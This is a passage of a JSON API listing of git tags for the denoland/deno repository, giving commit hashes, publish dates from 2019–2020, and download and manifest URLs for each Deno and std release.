s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8